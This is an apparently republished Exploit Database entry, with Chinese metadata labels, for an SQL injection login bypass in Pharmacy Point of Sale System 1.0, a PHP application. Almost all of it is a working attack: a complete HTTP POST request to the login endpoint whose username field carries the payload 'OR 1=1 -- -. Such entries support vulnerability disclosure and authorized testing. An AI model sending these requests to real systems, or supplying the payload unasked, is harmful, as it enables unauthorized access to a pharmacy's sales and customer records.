Pharmacy Point of Sale System 1.0 – SQLi Authentication BYpass

• Exploit Database
• 17 阅读

• 作者： Janik Wehrli
  日期： 2021-09-24
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/50329/

• # Exploit Title: Pharmacy Point of Sale System 1.0 - SQLi Authentication Bypass
  # Date: 23.09.2021
  # Exploit Author: Janik Wehrli
  # Vendor Homepage: https://www.sourcecodester.com/php/14957/pharmacy-point-sale-system-using-php-and-sqlite-free-source-code.html
  # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/pharmacy.zip
  # Version: 1.0
  # Tested on: Kali Linux, Windows 10
  
  # Pharmacy Point of Sale System v1.0 Login can be bypassed with a simple SQLi
  
  
  POST /pharmacy/Actions.php?a=login HTTP/1.1
  Host: 192.168.209.170
  Content-Length: 38
  Accept: application/json, text/javascript, */*; q=0.01
  X-Requested-With: XMLHttpRequest
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
  Content-Type: application/x-www-form-urlencoded; charset=UTF-8
  Origin: http://192.168.209.170
  Referer: http://192.168.209.170/pharmacy/login.php
  Accept-Encoding: gzip, deflate
  Accept-Language: de-CH,de-DE;q=0.9,de;q=0.8,en-US;q=0.7,en;q=0.6
  Cookie: PHPSESSID=c5mtnqpcavhfgsambtnh4uklag
  Connection: close
  
  username='OR+1%3D1+--+-&password=PWNED